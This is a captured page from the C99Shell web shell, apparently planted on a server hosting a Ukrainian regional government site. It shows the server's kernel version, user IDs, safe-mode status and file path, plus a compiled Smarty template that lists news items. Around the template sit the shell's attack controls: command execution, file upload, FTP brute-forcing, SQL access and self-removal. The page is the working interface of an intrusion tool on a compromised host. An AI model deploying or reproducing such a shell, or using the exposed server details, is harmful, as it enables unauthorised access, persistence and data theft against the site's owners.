!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/old.zt-rada.gov.ua/tmp/_compile_user/news/   drwxrwx--x
Free 116.87 GB of 200.55 GB (58.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     4aab53c384dbf26383239d892ae002e6eef0162b.file.user-row.tpl.php (4.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php /* Smarty version Smarty3-RC3, created on 2011-05-10 23:08:14
         compiled from "user/templates/news/user-row.tpl" */ 
?>
<?php 
/*%%SmartyHeaderCode:20375053614dc99b2ec4bb12-49013596%%*/if(!defined('SMARTY_DIR')) exit('no direct access allowed');
$_smarty_tpl->decodeProperties(array (
  
'file_dependency' => 
  array (
    
'4aab53c384dbf26383239d892ae002e6eef0162b' => 
    array (
      
=> 'user/templates/news/user-row.tpl',
      
=> 1305058081,
    ),
  ),
  
'nocache_hash' => '20375053614dc99b2ec4bb12-49013596',
  
'function' => 
  array (
  ),
  
'has_nocache_code' => false,
)); 
/*/%%SmartyHeaderCode%%*/?>
<?php $_smarty_tpl
->tpl_vars["photo_title"] = new Smarty_variable("photo_title_".($_smarty_tpl->getVariable('ulang')->value), nullnull);?>
<?php $_smarty_tpl
->tpl_vars["news_title"] = new Smarty_variable("news_title_".($_smarty_tpl->getVariable('ulang')->value), nullnull);?>
<?php $_smarty_tpl
->tpl_vars["news_short_text"] = new Smarty_variable("news_short_text_".($_smarty_tpl->getVariable('ulang')->value), nullnull);?>
<?php  $_smarty_tpl
->tpl_vars['row'] = new Smarty_Variable;
 
$_from $_smarty_tpl->getVariable('rows')->value; if (!is_array($_from) && !is_object($_from)) { settype($_from'array');}
if (
count($_from) > 0){
    foreach (
$_from as $_smarty_tpl->tpl_vars['row']->key => $_smarty_tpl->tpl_vars['row']->value){
?>
<?php ob_start
();?><?php echo $_smarty_tpl->getVariable('mod')->value;?>
<?php $_tmp1
=ob_get_clean();?><?php $_smarty_tpl->tpl_vars["news_main_photo"] = new Smarty_variable($_smarty_tpl->getVariable('Photomanager')->value->GetMainPhoto($_tmp1,"news_id=".($_smarty_tpl->tpl_vars['row']->value['news_id'])), nullnull);?>
<div class="row">
         <?php if ($_smarty_tpl->tpl_vars['row']->value['news_show_title']=='Y'){?>
          <div class="title" style="float: left; padding: 3px;">
           <?php if ($_smarty_tpl->tpl_vars['row']->value['news_show_read_more_link']=='Y'){?>
             <a href="/news/p<?php echo $_smarty_tpl->tpl_vars['row']->value['news_id'];?>
"><?php echo $_smarty_tpl->tpl_vars['row']->value[$_smarty_tpl->getVariable('news_title')->value];?>
</a>
           <?php }else{ ?>
             <?php echo $_smarty_tpl->tpl_vars['row']->value[$_smarty_tpl->getVariable('news_title')->value];?>

           <?php }?>
          </div>
         <?php }?>

         <?php if ($_smarty_tpl->tpl_vars['row']->value['news_show_date']=='Y'){?>
          <div class="date"><?php echo GetUsefulDate($_smarty_tpl->tpl_vars['row']->value['news_date'],true,false);?>
</div>
         <?php }?>
         <?php if ($_smarty_tpl->tpl_vars['row']->value['news_show_date']=='1'){?>
          <div class="date"><?php echo GetUsefulDate($_smarty_tpl->tpl_vars['row']->value['news_date'],true,false);?>
</div>
         <?php }?>
         <br clear="all" />
  <div class="short-text">  
   <?php if (file_exists($_smarty_tpl->getVariable('news_main_photo')->value['photo_filename'])==1){?>   
     <?php if ($_smarty_tpl->tpl_vars['row']->value['news_show_read_more_link']=='Y'){?>
       <a href="/news/p<?php echo $_smarty_tpl->tpl_vars['row']->value['news_id'];?>
">
         <img src="/<?php echo $_smarty_tpl->getVariable('news_main_photo')->value['photo_filename'];?>
" class="photo" alt="<?php echo $_smarty_tpl->getVariable('news_main_photo')->value[$_smarty_tpl->getVariable('photo_title')->value];?>
" title="<?php echo $_smarty_tpl->getVariable('news_main_photo')->value[$_smarty_tpl->getVariable('photo_title')->value];?>
" />
       </a>
     <?php }else{ ?>
       <img src="/<?php echo $_smarty_tpl->getVariable('news_main_photo')->value['photo_filename'];?>
" class="photo" alt="<?php echo $_smarty_tpl->getVariable('news_main_photo')->value[$_smarty_tpl->getVariable('photo_title')->value];?>
" title="<?php echo $_smarty_tpl->getVariable('news_main_photo')->value[$_smarty_tpl->getVariable('photo_title')->value];?>
" />
     <?php }?>      
   <?php }?>    
  <?php echo $_smarty_tpl->tpl_vars['row']->value['news_short_text_ukr'];?>

  </div>
 <?php if ($_smarty_tpl->tpl_vars['row']->value['news_show_read_more_link']=='Y'){?>
  <div class="readmore"><a href="/news/p<?php echo $_smarty_tpl->tpl_vars['row']->value['news_id'];?>
"><?php echo $_smarty_tpl->getVariable('ULANG')->value['CoreReadMore'];?>
</a></div>
 <?php }?>
 <div class="delimiter"></div>
</div>
<?php }} ?>
 <div class="allnews"><a href="/news/">Усі новини >>></a></div>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0367 ]--